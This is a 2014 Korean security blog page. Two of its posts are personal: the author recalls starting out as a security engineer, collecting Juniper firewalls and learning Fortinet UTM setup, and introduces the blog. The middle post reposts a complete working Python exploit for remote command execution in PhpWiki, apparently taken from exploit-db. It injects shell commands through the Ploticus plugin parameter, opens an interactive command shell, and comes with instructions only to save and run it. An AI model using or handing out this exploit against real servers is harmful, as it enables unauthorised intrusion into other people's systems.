보안 엔지니어를 시작하며..

주인장 발자취 2014. 9. 9. 12:50

회사에 첫 입사를 하고나서 제일먼저 한일은 보안 엔지니어 부터 시작을 했습니다

보통 보안엔지니어라고 하면 멋드러진걸 생각하는 사람도 있을거 같은데...
제일 처음에 한일은 다쓰고난 장비를 회수 하는것부터 했습니다.


어느정도 규모가 되는 회사들은 렉에 들어가는 보안장비를 사용하지만 10인 이하의 소규모 회사들은 현재 사용하고 있는 공유기보다 조금더 큰 보안장비를 사용하고 있습니다.


아직도 기억나는게 제일 처음 회수한 장비는 주니퍼사의 넷스크린 ns-5gt 입니다



[이렇게 생긴거~~ ]



사실 한 3개월 정도는 특별하게 한건 없고 수도권(서울/경기권)을 돌아 다니면서 계약이 만료된 업체에서 장비를 수거한게 다 입니다


거리가 멀어서 하루에 3-4개 정도 회수를 하면 그날 일은 끝나는 그런 단순한 일을 했습니다.


그러다가 한 2-3개월 정도부터 기초적인 장비 셋팅법을 배우기 시작을 하였습니다.

제일 처음 장비 셋팅을 하기 시작한건 포티넷의 UTM 장비로 배우기 시작을 했던거 같습니다.

사실 UTM 이란 단어가 생소할듯 하지만 굳이 풀어서 이야기 하자면 방화벽 + IDS + IPS + 안티스팸과 같은 다양한 보안기능이 1개의 어플라이언스 제품에 동작하는 장비를 이야기 합니다.


최근 보안장비들은 거의다 UTM 장비라고 봐도 될 정도로 다양한 기능을 구현하고 있는데 예전 제품들은 그러지를 못하였습니다.


뭐..방화벽의 역사를 쓰고자 하는건 아니라서......대충 예전 생각하니깐 떠올라 주저리 주저리 써봅니다..


다음편에 계속 이야기 하겠습니다..




저작자표시 비영리 변경금지

'주인장 발자취' 카테고리의 다른 글

UTM 장비란 무엇인가??  (0) 2014.09.16
주인장 보안을 시작하며..  (0) 2014.09.06
Posted by 비타민A
,

PhpWiki - Remote Command Execution

보안/웹 2014. 9. 9. 12:37

출처 : www.exploit-db.com


PhpWik의 원격 명령실행 파이선 스크립트 입니다

사용법은 아래 코드를 파이썬 확장자로 저장후 스크립트를 실행하면 됩니다

따로 자세한 설명이 필요없어서 코드만 게시를 합니다.


향후 자세한 설명이나 실행법이 필요한 코드가 있으면 따로 서술 하겠습니다



###############################################################
#    ____                    __                  _ __   _
#   / __/_  ______ _  ____  / /_  ____ _      __(_) /__(_)
#  / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ /
# / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / / 
#/_/  \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/  
#             /_/ /_/         /_/                    
# Diskovered in Nov/Dec 2011
###############################################################
 
import urllib
import urllib2
import sys
def banner():
    print "     ____                    __                  _ __   _ "
    print "    / __/_  ______ _  ____  / /_  ____ _      __(_) /__(_)"
    print "   / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / "
    print "  / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /  "
    print " /_/  \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/   "
    print "              /_/ /_/         /_/                     \n"
 
 
def usage():
    banner()
    print " [+] Usage example"
    print " [-] python " + sys.argv[0] + " http://path.to/wiki"
 
if len(sys.argv)< 2:
    usage()
    quit()
 
domain = sys.argv[1]
def commandexec(cmd):
    data = urllib.urlencode([('pagename','HeIp'),('edit[content]','<<Ploticus device=";echo 123\':::\' 1>&2;'+cmd+' 1>&2;echo \':::\'123 1>&2;" -prefab= -csmap= data= alt= help= >>'),('edit[preview]','Preview'),('action','edit')])
    cmd1 = urllib2.Request(domain +'/index.php/HeIp',data)
    cmd2 = urllib2.urlopen(cmd1)
    output = cmd2.read()
    firstloc = output.find("123:::\n") + len("123:::\n")
    secondloc = output.find("\n:::123")
    return output[firstloc:secondloc]
 
 
banner()
print commandexec('uname -a')
print commandexec('id')
while(quit != 1):
    cmd = raw_input('Run a command: ')
    if cmd == 'quit':
        print "[-] Hope you had fun :)"
        quit = 1
    if cmd != 'quit':
        print commandexec(cmd)


저작자표시 비영리 변경금지

'보안 > ' 카테고리의 다른 글

WordPress DDOS 공격 분석  (0) 2014.09.30
Bash Vulnerability CVE-2014-6271 Test Tool  (0) 2014.09.26
Bash Environment Variables Code Injection Exploit (CVE-2014-6271)  (0) 2014.09.26
Internet Explorer MS14-029 취약점 코드  (0) 2014.09.21
Http File Server 2.3.x - Remote Command Execution  (0) 2014.09.16
Posted by 비타민A
,

주인장 보안을 시작하며..

주인장 발자취 2014. 9. 6. 15:46

안녕하세요..

주인장입니다...ㅡ.ㅡ...


살면서 처음 블로그를 시작을 하게 되었습니다


이유는..음....그냥 조금이라도 나이가 더 들기전에 기록을 남기자..정도???입니다


천천히 시간이 될때마다 정보도 글을 좀 올리고...잡담도 좀 하는정도가 될거 같습니다.


첫 직장으로 보안을 시작한지 2007년 12월 부터니깐..7년정도 된거 같습니다

많으면 많은 시간이고 모자라면 모자란 시간인데 그래도 한번쯤은 이야기 할 수 있는 시간

일거 같습니다


첫 보안을 시작하게 된 계기와 그동안 보안일을 어떻게 한건지에 대한 발자국정도 라고 생각하시면 될거 같습니다


혹시나 하는 맘이지만 보안을 시작하는 분들에게 어느정도 도움이 되지 않을까..하는 생각도 합니다.


앞으로 좋은 글로 찾아 뵙도록 하겠습니다.

저작자표시 비영리 변경금지

'주인장 발자취' 카테고리의 다른 글

UTM 장비란 무엇인가??  (0) 2014.09.16
보안 엔지니어를 시작하며..  (0) 2014.09.09
Posted by 비타민A
,

티스토리툴바